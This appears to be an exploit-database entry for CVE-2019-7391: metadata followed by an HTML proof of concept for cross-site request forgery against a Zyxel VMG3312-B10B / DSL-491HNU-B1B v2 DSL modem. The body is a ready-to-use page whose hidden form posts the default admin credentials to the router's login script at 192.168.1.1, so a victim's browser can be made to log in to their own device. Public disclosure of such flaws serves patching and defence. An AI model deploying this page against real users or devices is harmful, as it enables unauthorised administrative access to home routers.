Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery
Author: Yusuf Furkan
type: webapps
platform: hardware
port: 80.0
date_added: 2019-02-05
date_updated: 2019-02-05
verified: 0
codes: CVE-2019-7391
tags: Cross-Site Request Forgery (CSRF)
aliases:
screenshot_url:
application_url:
# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2
<html>
<!-- CSRF PoC - generated by Yusuf -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/login/login-page.cgi" method="POST">
<input type="hidden" name="AuthName" value="admin" />
<input type="hidden" name="AuthPassword" value="1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>